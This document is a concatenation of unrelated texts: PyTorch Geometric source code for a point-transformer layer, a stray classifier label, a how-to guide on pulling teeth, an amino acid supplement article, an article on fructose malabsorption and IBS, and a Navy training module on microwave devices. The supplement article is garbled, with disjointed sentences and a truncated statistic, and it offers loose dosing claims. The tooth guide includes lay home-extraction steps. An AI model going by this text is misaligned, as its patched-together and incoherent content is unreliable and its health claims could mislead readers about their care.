Shapes: - **input:** node features :math:`(|\mathcal{V}|, F_{in})` or :math:`((|\mathcal{V_s}|, F_{s}), (|\mathcal{V_t}|, F_{t}))` if bipartite, positions :math:`(|\mathcal{V}|, 3)` or :math:`((|\mathcal{V_s}|, 3), (|\mathcal{V_t}|, 3))` if bipartite, edge indices :math:`(2, |\mathcal{E}|)` - **output:** node features :math:`(|\mathcal{V}|, F_{out})` or :math:`(|\mathcal{V}_t|, F_{out})` if bipartite """ def __init__(self, in_channels: Union[int, Tuple[int, int]], out_channels: int, pos_nn: Optional[Callable] = None, attn_nn: Optional[Callable] = None, add_self_loops: bool = True, **kwargs): kwargs.setdefault('aggr', 'mean') super().__init__(**kwargs) self.in_channels = in_channels self.out_channels = out_channels self.add_self_loops = add_self_loops if isinstance(in_channels, int): in_channels = (in_channels, in_channels) self.pos_nn = pos_nn if self.pos_nn is None: self.pos_nn = Linear(3, out_channels) self.attn_nn = attn_nn self.lin = Linear(in_channels[0], out_channels, bias=False) self.lin_src = Linear(in_channels[0], out_channels, bias=False) self.lin_dst = Linear(in_channels[1], out_channels, bias=False) self.reset_parameters() [docs] def reset_parameters(self): reset(self.pos_nn) if self.attn_nn is not None: reset(self.attn_nn) self.lin.reset_parameters() self.lin_src.reset_parameters() self.lin_dst.reset_parameters() [docs] def forward( self, x: Union[Tensor, PairTensor], pos: Union[Tensor, PairTensor], edge_index: Adj, ) -> Tensor: """""" if isinstance(x, Tensor): alpha = (self.lin_src(x), self.lin_dst(x)) x: PairTensor = (self.lin(x), x) else: alpha = (self.lin_src(x[0]), self.lin_dst(x[1])) x = (self.lin(x[0]), x[1]) if isinstance(pos, Tensor): pos: PairTensor = (pos, pos) if self.add_self_loops: if isinstance(edge_index, Tensor): edge_index, _ = remove_self_loops(edge_index) edge_index, _ = add_self_loops( edge_index, num_nodes=min(pos[0].size(0), pos[1].size(0))) elif isinstance(edge_index, SparseTensor): edge_index = set_diag(edge_index) # propagate_type: (x: PairTensor, pos: PairTensor, alpha: PairTensor) out = self.propagate(edge_index, x=x, pos=pos, alpha=alpha, size=None) return out def message(self, x_j: Tensor, pos_i: Tensor, pos_j: Tensor, alpha_i: Tensor, alpha_j: Tensor, index: Tensor, ptr: OptTensor, size_i: Optional[int]) -> Tensor: delta = self.pos_nn(pos_i - pos_j) alpha = alpha_i - alpha_j + delta if self.attn_nn is not None: alpha = self.attn_nn(alpha) alpha = softmax(alpha, index, ptr, size_i) return alpha * (x_j + delta) def __repr__(self) -> str: return (f'{self.__class__.__name__}({self.in_channels}, ' f'{self.out_channels})')
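For reference, here is a minimal usage sketch of the layer defined in this file; the node count, feature sizes, positions and edges below are arbitrary toy values and are not part of the original source.

import torch
from torch_geometric.nn import PointTransformerConv

x = torch.randn(6, 16)                      # 6 nodes, each with 16-dimensional features
pos = torch.randn(6, 3)                     # 3D position of each point
edge_index = torch.tensor([[0, 1, 2, 3, 4, 5],
                           [1, 2, 3, 4, 5, 0]])  # a simple directed ring of edges

conv = PointTransformerConv(in_channels=16, out_channels=32)
out = conv(x, pos, edge_index)              # forward(x, pos, edge_index) as defined above
print(out.shape)                            # torch.Size([6, 32])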
__label__pos
0.999942
Edit Article Removing Teeth in ChildrenRemoving Teeth in AdultsMedically Unqualified Home Remedies Edited by Andy Zhang, Versageek, Alexander M, Flickety and 76 others Pulling teeth, called tooth extraction by dental professionals, is not something that can be done without dental training. In most cases, it's advisable to leave the tooth alone until it falls out itself, or schedule an appointment with a dentist. In almost all cases, a dentist with a properly-trained team and special dental equipment will be better suited to remove a problem tooth than the individual at home. Ad Method 1 of 3: Removing Teeth in Children 1. Pull Out a Tooth Step 1.jpg 1 Let nature take its course. Most doctors and dentists recommend that parents not try to do anything to speed up the natural process.[1][2] Teeth that are extracted too early provide less of a guide to the teeth that grow in its place.[3] Any child will tell you that this, too, is an unnecessarily painful option. Ad 2. Pull Out a Tooth Step 2.jpg 2 Monitor the tooth as it gets looser. Make sure that the tooth and the surrounding gum area looks healthy and is free of decay and infection. If the tooth becomes decayed, it may need to be surgically removed in a dental office. 3. Pull Out a Tooth Step 3.jpg 3 If anything, advise your child to wiggle the tooth, but only with the tongue. Not all parents choose to give their child permission to wiggle the tooth, but those who do might want to instruct their child to wiggle only with the tongue. This is for two reasons: • Wiggling with the hands can introduce bacteria and dirt into the mouth, clearing the way for infection. Children aren't exactly the cleanest creatures in the world, making this a recipe for poor dental health in addition to bad hygiene. • The tongue is generally gentler than the hand. Children run a higher risk of accidentally pulling a tooth out before it's ready when they use their fingers to pull out the tooth. Wiggling the tooth with their tongues lowers the risk because the tongue can't grip onto the tooth in the same way that two fingers can. 4. Pull Out a Tooth Step 4.jpg 4 If the new tooth grows in an unexpected location, see a dentist. Permanent teeth coming in behind baby teeth, sometimes known as "sharking" because of the two sets of teeth, is a reversible and common condition. As long as the dentist removes the baby tooth and gives it enough room to move into its intended position in the mouth, it shouldn't be an issue. 5. Pull Out a Tooth Step 5.jpg 5 If the child lets the tooth come out on its own, expect to see very little blood. Children who have waited the proper amount of time for their old tooth to fall out (sometimes as much as 2 to 3 months), there should be very little blood. • If any wiggling or pulling of teeth causes excessive amounts of blood, instruct the child to stop wiggling; the tooth is most likely not yet ready to be extracted, and shouldn't be aggravated further. 6. Pull Out a Tooth Step 6.jpg 6 If the tooth is still loose but not extracted after 2 to 3 months, see a dentist. A dentist will be able to administer a topical pain killer and extract the tooth with the appropriate instruments. 7. Pull Out a Tooth Step 7.jpg 7 When the tooth comes out on its own, hold a piece of gauze over the extraction site. Tell the child to bite down lightly on the gauze. A new blood clot should start forming in the extraction site. • If the socket has lost its clot, an infection could occur. 
This condition is called dry socket (alveolar osteitis), and is often accompanied by a foul-smelling odor.[4] Contact your dentist if you believe the clot hasn't set appropriately. Method 2 of 3: Removing Teeth in Adults 1. 1 Try to figure out why your tooth needs pulling. Adult teeth are meant to last you lifetime if you take care of them. But if you do need to remove a tooth, it could be for a variety of reasons: • Crowded mouth. Your existing teeth haven't left enough room for your tooth that's trying to move into its proper place. A dentist may be forced to remove the tooth if this is the case. Pull Out a Tooth Step 8Bullet1.jpg • Tooth decay or infection. If infection of the tooth extends all the way down to the pulp, a dentist may need to administer antibiotics or even try a root canal. If a root canal does not fix the problem, a dentist may need to extract the tooth. Pull Out a Tooth Step 8Bullet2.jpg • Compromised immune system. If you are undergoing an organ transplant or chemotherapy, even the threat of infection might motivate a doctor to extract a tooth.[5] Pull Out a Tooth Step 8Bullet3.jpg • Periodontal disease. This disease is caused an infection of the tissues and bones that surround and support the teeth. If periodontal disease has infiltrated the tooth, a dentist may need to take it out. Pull Out a Tooth Step 8Bullet4.jpg 2. Pull Out a Tooth Step 9.jpg 2 Schedule an appointment with your doctor. Do not try to extract the tooth on your own. It's far safer to let a professional dentist extract the tooth than try to be macho and do it on your own. In addition to being safer, it will also be much less painful. 3. Pull Out a Tooth Step 10.jpg 3 Allow the dentist to give you local anesthetic to numb the area of the tooth. 4. Pull Out a Tooth Step 11.jpg 4 Allow the dentist to extract the tooth. The dentist may need to remove part of the gum in order to get at the tooth. In severe cases, the dentist may also need to remove the tooth itself in pieces.[5] 5. Pull Out a Tooth Step 12.jpg 5 Allow a blod clot to form over the extraction site. A blod clot is a sign that your tooth and surrounding gum areas are healing. Hold a piece of gauze over the extraction site and bite down lightly on the gauze. A new blood clot should start forming in the extraction site. • If the socket has lost its clot, an infection could occur. This condition is called dry socket (alveolar osteitis), and is often accompanied by a foul-smelling odor.[4] Contact your dentist if you believe the clot hasn't set appropriately. • If you want to reduce the swelling, place an icepack on the outside of the jaw near to where the tooth was removed. This should reduce the swelling and numb the pain. 6. 6 In the days following the extraction, take care to let your clot heal. In order to do this, try to: • Avoid spitting or rinsing forcefully. Try to avoid drinking from a straw with the first 24 hours. Pull Out a Tooth Step 13Bullet1.jpg • After 24 hours, gargle lightly with a saltwater solution made of 1/2 teaspoon salt and 8 ounces of warm water. Pull Out a Tooth Step 13Bullet2.jpg • Do not smoke. Pull Out a Tooth Step 13Bullet3.jpg • Eat soft foods and liquids for the first few days. Avoid hard, solid foods that take a lot of chewing to break down. Pull Out a Tooth Step 13Bullet4.jpg • Floss and brush your teeth as usual, taking care not to floss and brush the extraction site. Pull Out a Tooth Step 13Bullet5.jpg Method 3 of 3: Medically Unqualified Home Remedies 1. 
1. Use a bit of gauze and lightly wiggle the tooth back and forth. Give the person a bit of gauze and tell them to hold the gauze over the tooth.
• Gently wiggle the tooth back and forth, from side to side. The key word here is "gentle."
• If lots of blood comes out, consider stopping the procedure. Lots of blood is usually a sign that the tooth isn't yet ready to come out.
• Firmly but slowly lift the tooth up until the ligaments connecting the tooth to the gum are severed. If there is too much pain or blood, consider stopping the procedure.
2. Have the person bite down on an apple. Biting down on an apple can be a good way to pull a tooth, especially for children. Biting down on an apple is more effective for teeth in the front than it is for teeth in the back.

Tips
• Move the tooth around very slowly.
• This only works properly when the tooth is no longer anchored to any bone and is only being held in place by gum tissue. Teeth in this state move freely in pretty much every direction and can be painful.

Warnings
• If you suspect an infection, see a dentist immediately. Prolonged and untreated infections can develop into greater health risks.
• If you are an adult or an adolescent and have loose teeth, see a dentist immediately. They can address most problems, as well as offer advice on the risks of pulling a tooth yourself.
• Pulling a tooth is very different from caring for a broken or knocked-out tooth, both in adult teeth and primary teeth. If your child's teeth have been damaged by physical trauma (i.e., a fall) and appear to be broken, do not follow these directions.
What Everybody Should Know about Amino Acid Supplements

The sending neuron is known as the presynaptic cell, while the receiving one is called the postsynaptic cell. Phenylalanine hydroxylase (PAH; more specifically, phenylalanine 4-hydroxylase) is a mixed-function monooxygenase and one of three enzymes belonging to the biopterin-dependent aromatic amino acid hydroxylase (AAAH) family. The other two enzymes in the AAAH family are tyrosine hydroxylase and tryptophan hydroxylase. The metabolism and detoxification of numerous xenobiotic compounds is also known to require SAM-dependent methyltransferase family enzymes. The function of the enzyme isoprenylcysteine carboxyl methyltransferase (encoded by the ICMT gene) is to methylate the cysteine residues in the C-terminus of proteins following their prenylation. The SAM-dependent protein methyltransferase encoded by the LCMT1 gene (leucine carboxyl methyltransferase 1) catalyzes the methylation of a C-terminal leucine residue in the Ser/Thr phosphatase known as PP2A, a modification required for its proper function. Additional enzymes that use SAM as a methyl donor are involved in the modification of proteins that serve functions in numerous processes such as protein damage repair, protein stability, and protein function. However, some characteristics of glutamine, such as low solubility in water, easy decomposition and poor thermal stability, as well as the production of toxic pyroglutamate during heat sterilization, have limited its application in medicine. Reduced capacity to carry out the methionine synthase reaction, as a result of nutritional or disease-mediated deficiency of vitamin B12, results in decreased SAM production.
• L-Glutamine is used when one is sick or injured, as it helps kill invading pathogens by boosting white cell production in key organs such as the liver.
So, which one should you select? Basically, glutamine picks up ammonia and shuttles it between tissues, where it can be used for a variety of functions, one of which is cell growth and tissue repair. The hydroxyl of tyrosine can deprotonate at high pH, forming the negatively charged phenolate. Tyrosine is produced in cells by hydroxylating the essential amino acid phenylalanine. This is most serious in the brain and heart because the cells in these tissues are non-dividing. The best essential amino acid supplements, with few added or artificial components, are considered to be purer, while supplements that contain a bunch of other substances are considered to be less pure. If you want to take the powder form of this nutrient, then 1–3 grams per day should do while fighting an infection. The required biopterin is in the form of tetrahydrobiopterin (often designated BH4 or H4B). Dihydrobiopterin is then converted to tetrahydrobiopterin by the NADH-dependent enzyme commonly referred to as dihydropteridine reductase.
The conversion of phosphatidylethanolamine (PE) to phosphatidylcholine (PC) requires the enzyme phosphatidylethanolamine N-methyltransferase (encoded by the PEMT gene), which carries out three successive SAM-dependent methylation reactions. But if you're a bicep boy who does 20 sets of curls, then get out of the squat rack and save your cash for a new sleeveless top instead! These methyltransferases are categorized as either N-methyltransferases or O-methyltransferases, depending on whether the acceptor of the methyl group is a nitrogen or an oxygen, respectively. These methyltransferases all utilize SAM as the methyl donor and incorporate the methyl group onto lysine residues, arginine residues, and histidine residues in proteins. The DNA methyltransferases encoded by the DNMT1 and DNMT3 genes utilize SAM in the methylation of cytidine residues found in CpG dinucleotides in DNA. It is found in abundance in carrots, papaya, and spinach leaves. The synthesis of the diphthamide residue found on His715 in human translation elongation factor eEF2 requires a methylation step involving SAM as the methyl donor. The conversion of serotonin to melatonin requires the enzyme acetylserotonin O-methyltransferase, encoded by the ASMT gene. Creatine synthesis also requires SAM-dependent methylation, in a reaction catalyzed by guanidinoacetate N-methyltransferase (encoded by the GAMT gene). 23.5% lower levels of creatine kinase (310 vs. You've most likely heard that calcium is good for strong bones, but some evidence suggests that calcium helps decrease cholesterol levels as well. The FDA claims that there is no evidence that NAC was used as a supplement prior to its use as a drug – so including NAC in a supplement makes the product an unapproved drug and thus illegal. The absorption has been shown to be reliable due to the use of the specialized MICROGEL™ technology. Humans express three genes that catalyze the SAM-dependent cysteine methylation reaction on prenylated proteins, with the ICMT gene being the most abundantly expressed. This relationship is much like that between cysteine and methionine.
Fructose Malabsorption and IBS
Difficulty Digesting Fruit Sugar May Produce Discomfort

Berries are actually low in fructose and so may provide an option if a fructose malabsorption problem is contributing to your symptoms.

Is fructose malabsorption part of the IBS puzzle? Fructose is a type of sugar found in fruits and some vegetables. Some research has looked at the role that ingesting foods that contain fructose has on unpleasant digestive symptoms. Although quite limited and preliminary, the initial data is worth taking a look at if you suspect that fruits are contributing to your intestinal distress.

What Is Fructose Malabsorption?

The symptoms of fructose malabsorption, formerly known as fructose intolerance, are digestive discomforts after eating or drinking foods or drinks containing fructose, the sugar found in many fruits. The condition is thought to be the result of fructose not being fully absorbed in the small intestine. The fructose then makes its way into the large intestine, where it is set upon and fermented by intestinal bacteria. This process can affect GI motility and contribute to unwanted gas and bloating. Some people with fructose malabsorption can tolerate small amounts of fructose, but symptoms occur when too much fructose is ingested in too short a period of time. For some individuals, fructose malabsorption may be the result of small intestine bacterial overgrowth (SIBO). The identification of fructose malabsorption is a key component of the theory behind the use of a low-FODMAP diet for IBS. Fructose malabsorption is a markedly different condition than hereditary fructose intolerance, a genetic disorder typically diagnosed in infancy.

How Is Fructose Malabsorption Diagnosed?

The hydrogen breath test might be done, measuring the amount of hydrogen in the breath following the ingestion of a fructose solution. An increase in hydrogen is believed to indicate that the fructose in the solution has been fermented by bacteria in the large intestine. However, the hydrogen breath test is not completely reliable. It can show a positive result even if the person doesn't have malabsorption. While some reviews say it is valuable, others point out its unreliability. Small intestinal bacterial overgrowth (SIBO) is another possible diagnosis when the hydrogen breath test is positive, and the doctor must determine whether that is the proper diagnosis rather than fructose malabsorption.

What Are the Research Findings?

One study made a comparison between healthy individuals and people who self-identified as suffering from fructose intolerance based on the fact that they experienced bloating and flatulence after eating certain fruits. Although the results must be interpreted with caution due to the extremely small number of individuals (8 patients, 4 controls) who participated in the study, the results are interesting. The self-identified patients had higher hydrogen levels and did experience more bloating and flatulence as a result of drinking the solution than did the healthy individuals. The finding that test subjects experienced symptoms from the fructose solution itself was replicated in another study, one that used a much larger population. A total of 183 individuals who had unexplained digestive symptoms participated. Three-quarters of these individuals experienced abdominal symptoms following the ingestion of the fructose solution. These symptoms included flatulence, abdominal pain, bloating, belching and a change in bowel habit.
One study looked specifically at fructose intolerance in adults diagnosed with IBS. Of the 80 study participants, almost one-third had a positive hydrogen breath test result following ingestion of the fructose solution. Of these patients, 26 participated in a follow-up assessment one year later. On follow-up, 14 of these patients reported that they were able to comply with a fructose-restricted diet and experienced significant improvement in the symptoms of pain, belching, bloating, indigestion and diarrhea. Difficulty with fructose is one of the key findings behind the low-FODMAP theory for IBS. This theory has received significant research support for its effectiveness in reducing IBS symptoms.

The Bottom Line

Research on the role of fructose malabsorption in IBS is still in its preliminary stages. However, if your symptoms of gas, bloating and diarrhea seem related to the ingestion of fruits, a fructose problem might be something to consider. Keep a food diary for several weeks to determine if there is such a relationship. If so, speak to your doctor about the possibility of taking the hydrogen breath test and ask your doctor's opinion about trying an elimination diet.

Sources:

Food Allergies and Intolerances 105: Fructose Malabsorption. American Gastroenterological Association. http://www.gastro.org/info_for_patients/food-allergies-and-intolerances-105-fructose-malabsorption

Choi, Y., Kraft, N., Zimmerman, B., Jackson, M. & Rao, S. Fructose Intolerance in IBS and Utility of Fructose-Restricted Diet. Journal of Clinical Gastroenterology 2008; 42:233-238.

Fedewa, A. & Rao, S.S.C. Dietary Fructose Intolerance, Fructan Intolerance and FODMAPs. Current Gastroenterology Reports 2013; 16(1). doi:10.1007/s11894-013-0370-0.

Mann, N. & Cheung, E. Fructose-Induced Breath Hydrogen in Patients with Fruit Intolerance. Journal of Clinical Gastroenterology 2008; 42:157-159.

Yao, C.K. & Tuck, C.J. The Clinical Value of Breath Hydrogen Testing. Journal of Gastroenterology and Hepatology 2017; 32:20-22. doi:10.1111/jgh.13689.
Navy Electricity and Electronics Training Series (NEETS)
Module 11—Microwave Principles
Chapter 2: Pages 2-41 through 2-50

Figure 2-38.—Crossed-field amplifier (Amplitron).

Q-44. Why is the pi mode the most commonly used magnetron mode of operation?
Q-45. What two methods are used to couple energy into and out of magnetrons?
Q-46. Magnetron tuning by altering the surface-to-volume ratio of the hole portion of a hole-and-slot cavity is what type of tuning?
Q-47. Capacitive tuning by inserting a ring into the cavity slot of a magnetron is accomplished by what type of tuning mechanism?

SOLID-STATE MICROWAVE DEVICES

As with vacuum tubes, the special electronics effects encountered at microwave frequencies severely limit the usefulness of transistors in most circuit applications. The need for small-sized microwave devices has caused extensive research in this area. This research has produced solid-state devices with higher and higher frequency ranges. The new solid-state microwave devices are predominantly active, two-terminal diodes, such as tunnel diodes, varactors, transferred-electron devices, and avalanche transit-time diodes. This section will describe the basic theory of operation and some of the applications of these relatively new solid-state devices.

Tunnel Diode Devices

The TUNNEL DIODE is a PN junction with a very high concentration of impurities in both the p and n regions. The high concentration of impurities causes it to exhibit the properties of a negative-resistance element over part of its range of operation, as shown in the characteristic curve in figure 2-39. In other words, the resistance to current flow through the tunnel diode increases as the applied voltage increases over a portion of its region of operation. Outside the negative-resistance region, the tunnel diode functions essentially the same as a normal diode. However, the very high impurity density causes a junction depletion region so narrow that both holes and electrons can transfer across the PN junction by a quantum mechanical action called TUNNELING. Tunneling causes the negative-resistance action and is so fast that no transit-time effects occur even at microwave frequencies. The lack of a transit-time effect permits the use of tunnel diodes in a wide variety of microwave circuits, such as amplifiers, oscillators, and switching devices. The detailed theory of tunnel-diode operation and the negative-resistance property exhibited by the tunnel diode was discussed in NEETS, Module 7, Introduction to Solid-State Devices and Power Supplies, Chapter 3.

Figure 2-39.—Tunnel-diode characteristic curve.
TUNNEL-DIODE OSCILLATORS.—A tunnel diode, biased at the center point of the negative-resistance range (point B in figure 2-39) and coupled to a tuned circuit or cavity, produces a very stable oscillator. The oscillation frequency is the same as the tuned circuit or cavity frequency. Microwave tunnel-diode oscillators are useful in applications that require microwatts or, at most, a few milliwatts of power, such as local oscillators for microwave superheterodyne receivers. Tunnel-diode oscillators can be mechanically or electronically tuned over frequency ranges of about one octave and have a top-end frequency limit of approximately 10 gigahertz.

Tunnel-diode oscillators that are designed to operate at microwave frequencies generally use some form of transmission line as a tuned circuit. Suitable tuned circuits can be built from coaxial lines, transmission lines, and waveguides. An example of a highly stable tunnel-diode oscillator is shown in figure 2-40. A tunnel diode is loosely coupled to a high-Q tunable cavity. Loose coupling is achieved by using a short antenna feed probe placed off-center in the cavity. Loose coupling is used to increase the stability of the oscillations and the output power over a wider bandwidth.

Figure 2-40.—Tunnel-diode oscillator.

The output power produced is in the range of a few hundred microwatts, sufficient for many microwave applications. The frequency at which the oscillator operates is determined by the physical positioning of the tuner screw in the cavity. Changing the output frequency by this method is called MECHANICAL TUNING. In addition to mechanical tuning, tunnel-diode oscillators may be tuned electronically. One method is called BIAS TUNING and involves nothing more than changing the bias voltage to change the bias point on the characteristic curve of the tunnel diode. Another method is called VARACTOR TUNING and requires the addition of a varactor to the basic circuit. Varactors were discussed in NEETS, Module 7, Introduction to Solid-State Devices and Power Supplies, Chapter 3. Tuning is achieved by changing the voltage applied across the varactor, which alters the capacitance of the tuned circuit.

TUNNEL-DIODE AMPLIFIERS.—Low-noise, tunnel-diode amplifiers represent an important microwave application of tunnel diodes. Tunnel-diode amplifiers with frequencies up to 85 gigahertz have been built in waveguides, coaxial lines, and transmission lines. The low-noise generation, gain ratios of up to 30 dB, high reliability, and light weight make these amplifiers ideal for use as the first stage of amplification in communications and radar receivers. Most microwave tunnel-diode amplifiers are REFLECTION-TYPE, CIRCULATOR-COUPLED AMPLIFIERS. As in oscillators, the tunnel diode is biased to the center point of its negative-resistance region, but a CIRCULATOR replaces the tuned cavity. A circulator is a waveguide device that allows energy to travel in one direction only, as shown in figure 2-41. The tunnel diode in figure 2-41 is connected across a tuned-input circuit. This arrangement normally produces feedback that causes oscillations if the feedback is allowed to reflect back to the tuned-input circuit. The feedback is prevented because the circulator carries all excess energy to the absorptive load (RL). In this configuration the tunnel diode cannot oscillate, but will amplify.

Figure 2-41.—Tunnel-diode amplifier.
The desired frequency input signal is fed to port 1 of the circulator through a bandpass filter. The filter serves a dual purpose as a bandwidth selector and an impedance-matching device that improves the gain of the amplifiers. The input energy enters port 2 of the circulator and is amplified by the tunnel diode. The amplified energy is fed from port 2 to port 3 and on to the mixer. If any energy is reflected from port 3, it is passed to port 4, where it is absorbed by the matched load resistance.

TUNNEL-DIODE FREQUENCY CONVERTERS AND MIXERS.—Tunnel diodes make excellent mixers and frequency converters because their current-voltage characteristics are highly nonlinear. While other types of frequency converters usually have a conversion power loss, tunnel-diode converters can actually have a conversion power gain. A single tunnel diode can also be designed to act as both the nonlinear element in a converter and as the negative-resistance element in a local oscillator at the same time. Practical tunnel-diode frequency converters usually have either a unity conversion gain or a small conversion loss. Conversion gains as high as 20 dB are possible if the tunnel diode is biased near or into the negative-resistance region. Although high gain is useful in some applications, it presents problems in stability. For example, the greatly increased sensitivity to variations in input impedance can cause high-gain converters to be unstable unless they are protected by isolation circuitry. As with tunnel-diode amplifiers, low-noise generation is one of the more attractive characteristics of tunnel-diode frequency converters. Low-noise generation is a primary concern in the design of today's extremely sensitive communications and radar receivers. This is one reason tunnel-diode circuits are finding increasingly wide application in these fields.

Q-48. Name the procedure used to reduce excessive arcing in a magnetron?
Q-49. What causes the negative-resistance property of tunnel diodes?
Q-50. What determines the frequency of a tunnel-diode oscillator?
Q-51. Why is the tunnel diode loosely coupled to the cavity in a tunnel-diode oscillator?
Q-52. What is the purpose of the circulator in a tunnel-diode amplifier?

Varactor Devices

The VARACTOR is another of the active two-terminal diodes that operates in the microwave range. Since the basic theory of varactor operation was presented in NEETS, Module 7, Introduction to Solid-State Devices and Power Supplies, Chapter 3, only a brief review of the basic principles is presented here. The varactor is a semiconductor diode with the properties of a voltage-dependent capacitor. Specifically, it is a variable-capacitance, PN-junction diode that makes good use of the voltage dependency of the depletion-area capacitance of the diode. In figure 2-42A, two materials are brought together to form a PN-junction diode. The different energy levels in the two materials cause a diffusion of the holes and electrons through both materials which tends to balance their energy levels. When this diffusion process stops, the diode is left with a small area on either side of the junction, called the depletion area, which contains no free electrons or holes. The movement of electrons through the materials creates an electric field across the depletion area that is described as a barrier potential and has the electrical characteristics of a charged capacitor.

Figure 2-42A.—PN-junction diode as a variable capacitor.
External bias, applied in either the forward or reverse direction, as shown in figure 2-42B and C, affects the magnitude, barrier potential, and width of the depletion area. Enough forward or reverse bias will overcome the barrier potential and cause current to flow through the diode. The width of the depletion region can be controlled by keeping the bias voltage at levels that do not allow current flow. Since the depletion area acts as a capacitor, the diode will perform as a variable capacitor that changes with the applied bias voltage. The capacitance of a typical varactor can vary from 2 to 50 picofarads for a bias variation of just 2 volts.

Figure 2-42B.—PN-junction diode as a variable capacitor.

Figure 2-42C.—PN-junction diode as a variable capacitor.

The variable capacitance property of the varactor allows it to be used in circuit applications, such as amplifiers, that produce much lower internal noise levels than circuits that depend upon resistance properties. Since noise is of primary concern in receivers, circuits using varactors are an important development in the field of low-noise amplification. The most significant use of varactors to date has been as the basic component in parametric amplifiers.

PARAMETRIC AMPLIFIERS.—The parametric amplifier is named for the time-varying parameter, or value of capacitance, associated with the operation. Since the underlying principle of operation is based on reactance, the parametric amplifier is sometimes called a REACTANCE AMPLIFIER. The conventional amplifier is essentially a variable resistance that uses energy from a dc source to increase ac energy. The parametric amplifier uses a nonlinear variable reactance to supply energy from an ac source to a load. Since reactance does not add thermal noise to a circuit, parametric amplifiers produce much less noise than most conventional amplifiers.

Because the most important feature of the parametric amplifier is the low-noise characteristic, the nature of ELECTRONIC NOISE and the effect of this type of noise on receiver operation must first be discussed. Electronic noise is the primary limitation on receiver sensitivity and is the name given to very small randomly fluctuating voltages that are always present in electronic circuits. The sensitivity limit of the receiver is reached when the incoming signal falls below the level of the noise generated by the receiver circuits. At this point the incoming signal is hidden by the noise, and further amplification has no effect because the noise is amplified at the same rate as the signal. The effects of noise can be reduced by careful circuit design and control of operating conditions, but it cannot be entirely eliminated. Therefore, circuits such as the parametric amplifier are important developments in the fields of communication and radar.

The basic theory of parametric amplification centers around a capacitance that varies with time. Consider the simple series circuit shown in figure 2-43. When the switch is closed, the capacitor charges to value (Q). If the switch is opened, the isolated capacitor has a voltage across the plates determined by the charge Q divided by the capacitance C.

Figure 2-43.—Voltage amplification from a varying capacitor.

An increase in the charge Q or a decrease in the capacitance C causes an increase in the voltage across the plates.
Thus, a voltage increase, or amplification, can be obtained by mechanically or electronically varying the amount of capacitance in the circuit. In practice a voltage-variable capacitance, such as a varactor, is used. The energy required to vary the capacitance is obtained from an electrical source called a PUMP. Figure 2-44, view (A), shows a circuit application using a voltage-variable capacitor and a pump circuit. The pump circuit decreases the capacitance each time the input signal (E) across the capacitor reaches maximum. The decreased capacitance causes a voltage buildup as shown by the dotted line in view (B). Therefore, each time the pump decreases capacitance (view (C)), energy transfers from the pump circuit to the input signal. The step-by-step buildup of the input-signal energy level is shown in view (D).

Figure 2-44.—Energy transfer from pump signal to input signal.

Proper phasing between the pump and the input signal is crucial in this circuit. The electrical pump action is simply a sine-wave voltage applied to a varactor located in a resonant cavity. For proper operation, the capacitance must be decreased when the input voltage is maximum and increased when the input voltage is minimum. In other words, the pump signal frequency must be exactly double the frequency of the input signal. This relationship can be seen when you compare views (B) and (C). A parametric amplifier of the type shown in figure 2-44 is quite phase-sensitive. The input signal and the capacitor variation are often in the wrong phase for long periods of time.

A parametric amplifier that is not phase-sensitive, referred to as a NONDEGENERATIVE PARAMETRIC AMPLIFIER, uses a pump circuit with a frequency higher than twice the input signal. The higher-frequency pump signal mixes with the input signal and produces additional frequencies that represent both the sum and difference of the input signal and pump frequencies. Figure 2-45A is a diagram of a typical nondegenerative parametric amplifier with the equivalent circuit shown in figure 2-45B. The pump signal (fp) is applied to the varactor. The cavity on the left is resonant at the input frequency (fs), and the cavity on the right is resonant at the difference frequency (fp-fs). The difference frequency is called the IDLER- or LOWER-SIDEBAND frequency. The varactor is located at the high-voltage points of the two cavities and is reverse biased by a small battery. The pump signal varies the bias above and below the fixed-bias level.

Figure 2-45A.—Nondegenerative parametric amplifier. CIRCUIT.

Figure 2-45B.—Nondegenerative parametric amplifier. ELECTRICAL EQUIVALENT.

The pump signal causes the capacitor in figure 2-45A to vary at a 12-gigahertz rate. The 3-gigahertz input signal enters via a four-port ferrite circulator, is developed in the signal cavity, and applied across the varactor. The nonlinear action of the varactor produces a 9-gigahertz difference frequency (fp-fs) with an energy level higher than the original input signal. The difference (idler) frequency is reapplied to the varactor to increase the gain and to produce an output signal of the correct frequency. The 9-gigahertz idler frequency recombines with the 12-gigahertz pump signal and produces a 3-gigahertz difference signal that has a much larger amplitude than the original 3-gigahertz input signal.
The amplified signal is sent to the ferrite circulator for transfer to the next stage. As with tunnel-diode amplifiers, the circulator improves stability by preventing reflection of the signal back into the amplifier. Reflections would be amplified and cause uncontrollable oscillations. The ferrite circulator also serves as an isolator to prevent source and load impedance changes from affecting gain. Typically, the gain of a parametric amplifier is about 20 dB. The gain can be controlled with a variable attenuator that changes the amount of pump power applied to the varactor.

Parametric amplifiers are relatively simple in construction. The only component is a varactor diode placed in an arrangement of cavities and waveguides. The most elaborate feature of the amplifier is the mechanical tuning mechanism. Figure 2-46 illustrates an actual parametric amplifier.

Figure 2-46.—Parametric amplifier.

PARAMETRIC FREQUENCY CONVERTERS.—Parametric frequency converters, using varactors, are of three basic types. The UPPER-SIDEBAND PARAMETRIC UP-CONVERTER produces an output frequency that is the SUM of the input frequency and the pump frequency. The LOWER-SIDEBAND PARAMETRIC DOWN-CONVERTER produces an output frequency that is the DIFFERENCE between the pump frequency and the input frequency. The DOUBLE-SIDEBAND PARAMETRIC UP-CONVERTER produces an output in which both the SUM and the DIFFERENCE of the pump and input frequencies are available. Parametric frequency converters are very similar to parametric amplifiers in both construction and operation. Figure 2-47 is a functional diagram of a parametric down-converter. The parametric frequency converter operates in the same manner as the parametric amplifier except that the sideband frequencies are not reapplied to the varactor. Therefore, the output is one or both of the sideband frequencies and is not the same as the input frequency. The output frequency is determined by the cavity used as an output. For example, the idler cavity in figure 2-47 could be replaced by a cavity that is resonant at the upper-sideband frequency (22 gigahertz) to produce an upper-sideband parametric up-converter. Since input and output signals are at different frequencies, the parametric frequency converter does not require a ferrite circulator. However, a ferrite isolator is used to isolate the converter from changes in source impedance.

Figure 2-47.—Lower-sideband parametric down-converter.
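As a quick worked recap of the nondegenerative amplifier example of figure 2-45 (using only the pump and signal frequencies already given in the text above), the frequency bookkeeping is:

    idler (lower sideband) = fp - fs = 12 gigahertz - 3 gigahertz = 9 gigahertz
    amplified output       = fp - idler = 12 gigahertz - 9 gigahertz = 3 gigahertz (the original signal frequency)
    upper sideband         = fp + fs = 12 gigahertz + 3 gigahertz = 15 gigahertz (the sum frequency used by an upper-sideband up-converter)

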